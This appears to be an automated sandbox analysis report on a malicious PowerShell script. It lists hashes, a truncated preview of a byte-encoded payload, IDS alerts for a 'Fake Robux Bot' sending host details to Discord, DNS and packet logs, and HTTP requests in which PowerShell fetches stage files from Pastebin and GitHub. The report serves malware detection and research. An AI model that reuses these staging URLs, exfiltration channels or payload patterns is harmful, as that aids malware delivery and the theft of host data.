                                                                          Preview:...................................FL..................F.".. ....'GDj...\g......z.:{.............................:..DG..Yr?.D..U..k0.&...&.......bBDj...F................t...CFSF..1.....EWsG..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EWsGOY............................=...A.p.p.D.a.t.a...B.V.1.....OY....Roaming.@......EWsGOY..............................%.R.o.a.m.i.n.g.....\.1.....EWiI..MICROS~1..D......EWsGOY............................p.q.M.i.c.r.o.s.o.f.t.....V.1.....EW.J..Windows.@......EWsGOY................................W.i.n.d.o.w.s.......1.....EWuG..STARTM~1..n......EWsGOY......................D.........S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW.I..Programs..j......EWsGOY......................@.....?5..P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EWsGEWsG..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EWsGOY..................

                                                                          Static File Info

                                                                          General

                                                                          File type:ASCII text, with very long lines (17986)
                                                                          Entropy (8bit):3.642920230406947
                                                                          TrID:
                                                                            File name:cr_asm_menu..ps1
                                                                            File size:25'709 bytes
                                                                            MD5:8921aea500ed7ed76426c96b304de529
                                                                            SHA1:3dba5efe9f6037e31eb7b794935633c2d0c35468
                                                                            SHA256:47490ff15e6c2aa96746eeffeca6997f01be04f1fc484d27b2a59020448aafe4
                                                                            SHA512:84d44c8f7cf7de004809954984b2bf0ce37804ab2afa776dae1f014032bf6d38d33faa1ad5848b007e284f7b6be4251697a2b2fc15c14b03539eb30480a86ba8
                                                                            SSDEEP:192:bDy2fNXj5GA+uHoM7hMFwpFshbwqUdMVij2J:bDy2fNXj5GA+i6Vb3UaXJ
                                                                            TLSH:57B245F5B318649FBAC7AF9CC3455152D26DD13123E0594BFBAD881AEACAC535030B2E
                                                                            File Content Preview:$bytes = @(0x24, 0x00, 0x53, 0x00, 0x6F, 0x00, 0x75, 0x00, 0x72, 0x00, 0x63, 0x00, 0x65, 0x00, 0x20, 0x00, 0x3D, 0x00, 0x20, 0x00, 0x40, 0x00, 0x22, 0x00, 0x0A, 0x00, 0x75, 0x00, 0x73, 0x00, 0x69, 0x00, 0x6E, 0x00, 0x67, 0x00, 0x20, 0x00, 0x53, 0x00, 0x79

                                                                            File Icon

                                                                            Icon Hash:3270d6baae77db44

                                                                            Network Behavior

                                                                            Suricata IDS Alerts

                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                            2024-10-15T18:09:29.481334+02002857658ETPRO MALWARE Win32/Fake Robux Bot Registration1192.168.2.949926162.159.137.232443TCP
                                                                            2024-10-15T18:09:43.079989+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.949983162.159.137.232443TCP
                                                                            2024-10-15T18:09:51.671332+02002857659ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil1192.168.2.949984162.159.137.232443TCP

                                                                            Network Port Distribution

                                                                            TCP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Oct 15, 2024 18:09:26.537137032 CEST4991380192.168.2.9172.67.19.24
                                                                            Oct 15, 2024 18:09:26.542812109 CEST8049913172.67.19.24192.168.2.9
                                                                            Oct 15, 2024 18:09:26.542927027 CEST4991380192.168.2.9172.67.19.24
                                                                            Oct 15, 2024 18:09:26.545824051 CEST4991380192.168.2.9172.67.19.24
                                                                            Oct 15, 2024 18:09:26.550682068 CEST8049913172.67.19.24192.168.2.9
                                                                            Oct 15, 2024 18:09:27.231216908 CEST8049913172.67.19.24192.168.2.9
                                                                            Oct 15, 2024 18:09:27.272852898 CEST4991380192.168.2.9172.67.19.24
                                                                            Oct 15, 2024 18:09:27.302028894 CEST49918443192.168.2.9172.67.19.24
                                                                            Oct 15, 2024 18:09:27.302081108 CEST44349918172.67.19.24192.168.2.9
                                                                            Oct 15, 2024 18:09:27.302145004 CEST49918443192.168.2.9172.67.19.24
                                                                            Oct 15, 2024 18:09:27.318248987 CEST49918443192.168.2.9172.67.19.24
                                                                            Oct 15, 2024 18:09:27.318272114 CEST44349918172.67.19.24192.168.2.9
                                                                            Oct 15, 2024 18:09:27.981180906 CEST44349918172.67.19.24192.168.2.9
                                                                            Oct 15, 2024 18:09:27.981266975 CEST49918443192.168.2.9172.67.19.24
                                                                            Oct 15, 2024 18:09:27.984003067 CEST49918443192.168.2.9172.67.19.24
                                                                            Oct 15, 2024 18:09:27.984025955 CEST44349918172.67.19.24192.168.2.9
                                                                            Oct 15, 2024 18:09:27.984282970 CEST44349918172.67.19.24192.168.2.9
                                                                            Oct 15, 2024 18:09:27.991921902 CEST49918443192.168.2.9172.67.19.24
                                                                            Oct 15, 2024 18:09:28.035408020 CEST44349918172.67.19.24192.168.2.9
                                                                            Oct 15, 2024 18:09:28.203401089 CEST44349918172.67.19.24192.168.2.9
                                                                            Oct 15, 2024 18:09:28.203528881 CEST44349918172.67.19.24192.168.2.9
                                                                            Oct 15, 2024 18:09:28.203578949 CEST49918443192.168.2.9172.67.19.24
                                                                            Oct 15, 2024 18:09:28.222997904 CEST49918443192.168.2.9172.67.19.24
                                                                            Oct 15, 2024 18:09:28.253591061 CEST4992480192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:28.258845091 CEST8049924185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:28.258920908 CEST4992480192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:28.259089947 CEST4992480192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:28.264012098 CEST8049924185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:28.499644041 CEST49926443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:28.499676943 CEST44349926162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:28.499777079 CEST49926443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:28.502803087 CEST49926443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:28.502811909 CEST44349926162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:28.898192883 CEST8049924185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:28.898463011 CEST4992480192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:28.900257111 CEST49927443192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:28.900302887 CEST44349927185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:28.900388956 CEST49927443192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:28.900698900 CEST49927443192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:28.900715113 CEST44349927185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:28.903734922 CEST8049924185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:28.908668041 CEST4992480192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:29.151937008 CEST44349926162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:29.152009964 CEST49926443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:29.154719114 CEST49926443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:29.154723883 CEST44349926162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:29.154927969 CEST44349926162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:29.163382053 CEST49926443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:29.207446098 CEST44349926162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:29.290086985 CEST44349926162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:29.290605068 CEST49926443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:29.290615082 CEST44349926162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:29.481367111 CEST44349926162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:29.481446981 CEST44349926162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:29.481901884 CEST49926443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:29.489953041 CEST49926443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:29.531217098 CEST44349927185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:29.531290054 CEST49927443192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:29.533142090 CEST49927443192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:29.533149958 CEST44349927185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:29.533356905 CEST44349927185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:29.534509897 CEST49927443192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:29.579397917 CEST44349927185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:29.664170980 CEST44349927185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:29.664388895 CEST44349927185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:29.664416075 CEST44349927185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:29.664439917 CEST49927443192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:29.664449930 CEST44349927185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:29.664484024 CEST49927443192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:29.664856911 CEST44349927185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:29.665122986 CEST44349927185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:29.665159941 CEST49927443192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:29.665164948 CEST44349927185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:29.666502953 CEST44349927185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:29.666734934 CEST49927443192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:29.694823027 CEST49927443192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:35.144110918 CEST4996380192.168.2.9172.67.19.24
                                                                            Oct 15, 2024 18:09:35.149111032 CEST8049963172.67.19.24192.168.2.9
                                                                            Oct 15, 2024 18:09:35.149302006 CEST4996380192.168.2.9172.67.19.24
                                                                            Oct 15, 2024 18:09:35.149987936 CEST4996380192.168.2.9172.67.19.24
                                                                            Oct 15, 2024 18:09:35.154947042 CEST8049963172.67.19.24192.168.2.9
                                                                            Oct 15, 2024 18:09:35.780900002 CEST8049963172.67.19.24192.168.2.9
                                                                            Oct 15, 2024 18:09:35.783355951 CEST49964443192.168.2.9172.67.19.24
                                                                            Oct 15, 2024 18:09:35.783466101 CEST44349964172.67.19.24192.168.2.9
                                                                            Oct 15, 2024 18:09:35.783576012 CEST49964443192.168.2.9172.67.19.24
                                                                            Oct 15, 2024 18:09:35.786194086 CEST49964443192.168.2.9172.67.19.24
                                                                            Oct 15, 2024 18:09:35.786228895 CEST44349964172.67.19.24192.168.2.9
                                                                            Oct 15, 2024 18:09:35.835211992 CEST4996380192.168.2.9172.67.19.24
                                                                            Oct 15, 2024 18:09:36.390804052 CEST44349964172.67.19.24192.168.2.9
                                                                            Oct 15, 2024 18:09:36.390916109 CEST49964443192.168.2.9172.67.19.24
                                                                            Oct 15, 2024 18:09:36.404311895 CEST49964443192.168.2.9172.67.19.24
                                                                            Oct 15, 2024 18:09:36.404371023 CEST44349964172.67.19.24192.168.2.9
                                                                            Oct 15, 2024 18:09:36.404711962 CEST44349964172.67.19.24192.168.2.9
                                                                            Oct 15, 2024 18:09:36.412216902 CEST49964443192.168.2.9172.67.19.24
                                                                            Oct 15, 2024 18:09:36.455445051 CEST44349964172.67.19.24192.168.2.9
                                                                            Oct 15, 2024 18:09:36.551139116 CEST44349964172.67.19.24192.168.2.9
                                                                            Oct 15, 2024 18:09:36.551260948 CEST44349964172.67.19.24192.168.2.9
                                                                            Oct 15, 2024 18:09:36.551424026 CEST49964443192.168.2.9172.67.19.24
                                                                            Oct 15, 2024 18:09:36.566901922 CEST49964443192.168.2.9172.67.19.24
                                                                            Oct 15, 2024 18:09:36.580452919 CEST4997080192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:36.585580111 CEST8049970185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:36.586849928 CEST4997080192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:36.587024927 CEST4997080192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:36.591845036 CEST8049970185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:37.215501070 CEST8049970185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:37.215742111 CEST4997080192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:37.216643095 CEST49976443192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:37.216672897 CEST44349976185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:37.216757059 CEST49976443192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:37.217005014 CEST49976443192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:37.217015982 CEST44349976185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:37.217372894 CEST8049970185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:37.217427969 CEST4997080192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:37.220901012 CEST8049970185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:37.837261915 CEST44349976185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:37.837342978 CEST49976443192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:37.839030027 CEST49976443192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:37.839040995 CEST44349976185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:37.839278936 CEST44349976185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:37.840346098 CEST49976443192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:37.887396097 CEST44349976185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:37.967545033 CEST44349976185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:37.967770100 CEST44349976185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:37.967847109 CEST49976443192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:37.967856884 CEST44349976185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:37.968343019 CEST44349976185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:37.968395948 CEST49976443192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:37.968400955 CEST44349976185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:37.968676090 CEST44349976185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:37.968719959 CEST49976443192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:37.968725920 CEST44349976185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:37.977292061 CEST44349976185.199.110.133192.168.2.9
                                                                            Oct 15, 2024 18:09:37.977379084 CEST49976443192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:38.028611898 CEST49976443192.168.2.9185.199.110.133
                                                                            Oct 15, 2024 18:09:42.229660988 CEST49983443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:42.229701042 CEST44349983162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:42.229830027 CEST49983443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:42.230412960 CEST49983443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:42.230427027 CEST44349983162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:42.849706888 CEST44349983162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:42.849828005 CEST49983443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:42.851362944 CEST49983443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:42.851373911 CEST44349983162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:42.851645947 CEST44349983162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:42.853563070 CEST49983443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:42.895407915 CEST44349983162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:42.895562887 CEST49983443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:42.895580053 CEST44349983162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:43.079986095 CEST44349983162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:43.080071926 CEST44349983162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:43.080176115 CEST49983443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:43.083077908 CEST49983443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:48.128206968 CEST4991380192.168.2.9172.67.19.24
                                                                            Oct 15, 2024 18:09:50.687170982 CEST49984443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:50.687223911 CEST44349984162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:50.687412024 CEST49984443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:50.687704086 CEST49984443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:50.687724113 CEST44349984162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:51.351480007 CEST44349984162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:51.351591110 CEST49984443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:51.352986097 CEST49984443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:51.352998018 CEST44349984162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:51.353656054 CEST44349984162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:51.354687929 CEST49984443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:51.399410963 CEST44349984162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:51.399504900 CEST49984443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:51.399513960 CEST44349984162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:51.671374083 CEST44349984162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:51.671556950 CEST44349984162.159.137.232192.168.2.9
                                                                            Oct 15, 2024 18:09:51.671613932 CEST49984443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:51.673783064 CEST49984443192.168.2.9162.159.137.232
                                                                            Oct 15, 2024 18:09:56.695544958 CEST4996380192.168.2.9172.67.19.24

                                                                            UDP Packets

                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                            Oct 15, 2024 18:09:26.519918919 CEST6141353192.168.2.91.1.1.1
                                                                            Oct 15, 2024 18:09:26.527199030 CEST53614131.1.1.1192.168.2.9
                                                                            Oct 15, 2024 18:09:28.244342089 CEST5531253192.168.2.91.1.1.1
                                                                            Oct 15, 2024 18:09:28.252899885 CEST53553121.1.1.1192.168.2.9
                                                                            Oct 15, 2024 18:09:28.488627911 CEST6338153192.168.2.91.1.1.1
                                                                            Oct 15, 2024 18:09:28.495572090 CEST53633811.1.1.1192.168.2.9

                                                                            DNS Queries

                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                            Oct 15, 2024 18:09:26.519918919 CEST192.168.2.91.1.1.10x6354Standard query (0)pastebin.comA (IP address)IN (0x0001)false
                                                                            Oct 15, 2024 18:09:28.244342089 CEST192.168.2.91.1.1.10xb5f0Standard query (0)raw.githubusercontent.comA (IP address)IN (0x0001)false
                                                                            Oct 15, 2024 18:09:28.488627911 CEST192.168.2.91.1.1.10x9913Standard query (0)discord.comA (IP address)IN (0x0001)false

                                                                            DNS Answers

                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                            Oct 15, 2024 18:08:44.105808973 CEST1.1.1.1192.168.2.90xad60No error (0)shed.dual-low.s-part-0023.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                            Oct 15, 2024 18:08:44.105808973 CEST1.1.1.1192.168.2.90xad60No error (0)dual.s-part-0023.t-0009.fb-t-msedge.nets-part-0023.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                            Oct 15, 2024 18:08:44.105808973 CEST1.1.1.1192.168.2.90xad60No error (0)s-part-0023.t-0009.fb-t-msedge.net13.107.253.51A (IP address)IN (0x0001)false
                                                                            Oct 15, 2024 18:09:26.527199030 CEST1.1.1.1192.168.2.90x6354No error (0)pastebin.com172.67.19.24A (IP address)IN (0x0001)false
                                                                            Oct 15, 2024 18:09:26.527199030 CEST1.1.1.1192.168.2.90x6354No error (0)pastebin.com104.20.4.235A (IP address)IN (0x0001)false
                                                                            Oct 15, 2024 18:09:26.527199030 CEST1.1.1.1192.168.2.90x6354No error (0)pastebin.com104.20.3.235A (IP address)IN (0x0001)false
                                                                            Oct 15, 2024 18:09:28.252899885 CEST1.1.1.1192.168.2.90xb5f0No error (0)raw.githubusercontent.com185.199.110.133A (IP address)IN (0x0001)false
                                                                            Oct 15, 2024 18:09:28.252899885 CEST1.1.1.1192.168.2.90xb5f0No error (0)raw.githubusercontent.com185.199.109.133A (IP address)IN (0x0001)false
                                                                            Oct 15, 2024 18:09:28.252899885 CEST1.1.1.1192.168.2.90xb5f0No error (0)raw.githubusercontent.com185.199.111.133A (IP address)IN (0x0001)false
                                                                            Oct 15, 2024 18:09:28.252899885 CEST1.1.1.1192.168.2.90xb5f0No error (0)raw.githubusercontent.com185.199.108.133A (IP address)IN (0x0001)false
                                                                            Oct 15, 2024 18:09:28.495572090 CEST1.1.1.1192.168.2.90x9913No error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                                            Oct 15, 2024 18:09:28.495572090 CEST1.1.1.1192.168.2.90x9913No error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                                            Oct 15, 2024 18:09:28.495572090 CEST1.1.1.1192.168.2.90x9913No error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                                            Oct 15, 2024 18:09:28.495572090 CEST1.1.1.1192.168.2.90x9913No error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                                            Oct 15, 2024 18:09:28.495572090 CEST1.1.1.1192.168.2.90x9913No error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false

                                                                            HTTP Request Dependency Graph

                                                                            • pastebin.com
                                                                            • discord.com
                                                                            • raw.githubusercontent.com

                                                                            HTTP Packets

                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            0192.168.2.949913172.67.19.24801172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 15, 2024 18:09:26.545824051 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                            Host: pastebin.com
                                                                            Connection: Keep-Alive
                                                                            Oct 15, 2024 18:09:27.231216908 CEST472INHTTP/1.1 301 Moved Permanently
                                                                            Date: Tue, 15 Oct 2024 16:09:27 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 167
                                                                            Connection: keep-alive
                                                                            Cache-Control: max-age=3600
                                                                            Expires: Tue, 15 Oct 2024 17:09:27 GMT
                                                                            Location: https://pastebin.com/raw/sA04Mwk2
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d3112d8a987485e-DFW
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            1192.168.2.949924185.199.110.133801172C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 15, 2024 18:09:28.259089947 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                            Host: raw.githubusercontent.com
                                                                            Connection: Keep-Alive
                                                                            Oct 15, 2024 18:09:28.898192883 CEST541INHTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            Content-Length: 0
                                                                            Server: Varnish
                                                                            Retry-After: 0
                                                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                            Accept-Ranges: bytes
                                                                            Date: Tue, 15 Oct 2024 16:09:28 GMT
                                                                            Via: 1.1 varnish
                                                                            X-Served-By: cache-dfw-kdfw8210133-DFW
                                                                            X-Cache: HIT
                                                                            X-Cache-Hits: 0
                                                                            X-Timer: S1729008569.835066,VS0,VE0
                                                                            Access-Control-Allow-Origin: *
                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                            Expires: Tue, 15 Oct 2024 16:14:28 GMT
                                                                            Vary: Authorization,Accept-Encoding


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            2192.168.2.949963172.67.19.24801796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 15, 2024 18:09:35.149987936 CEST169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                            Host: pastebin.com
                                                                            Connection: Keep-Alive
                                                                            Oct 15, 2024 18:09:35.780900002 CEST472INHTTP/1.1 301 Moved Permanently
                                                                            Date: Tue, 15 Oct 2024 16:09:35 GMT
                                                                            Content-Type: text/html
                                                                            Content-Length: 167
                                                                            Connection: keep-alive
                                                                            Cache-Control: max-age=3600
                                                                            Expires: Tue, 15 Oct 2024 17:09:35 GMT
                                                                            Location: https://pastebin.com/raw/sA04Mwk2
                                                                            Server: cloudflare
                                                                            CF-RAY: 8d31130e2dab2ff0-DFW
                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                            Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            3192.168.2.949970185.199.110.133801796C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Oct 15, 2024 18:09:36.587024927 CEST222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                            Host: raw.githubusercontent.com
                                                                            Connection: Keep-Alive
                                                                            Oct 15, 2024 18:09:37.215501070 CEST541INHTTP/1.1 301 Moved Permanently
                                                                            Connection: close
                                                                            Content-Length: 0
                                                                            Server: Varnish
                                                                            Retry-After: 0
                                                                            Location: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
                                                                            Accept-Ranges: bytes
                                                                            Date: Tue, 15 Oct 2024 16:09:37 GMT
                                                                            Via: 1.1 varnish
                                                                            X-Served-By: cache-dfw-kdfw8210029-DFW
                                                                            X-Cache: HIT
                                                                            X-Cache-Hits: 0
                                                                            X-Timer: S1729008577.159735,VS0,VE0
                                                                            Access-Control-Allow-Origin: *
                                                                            Cross-Origin-Resource-Policy: cross-origin
                                                                            Expires: Tue, 15 Oct 2024 16:14:37 GMT
                                                                            Vary: Authorization,Accept-Encoding


                                                                            HTTPS Proxied Packets

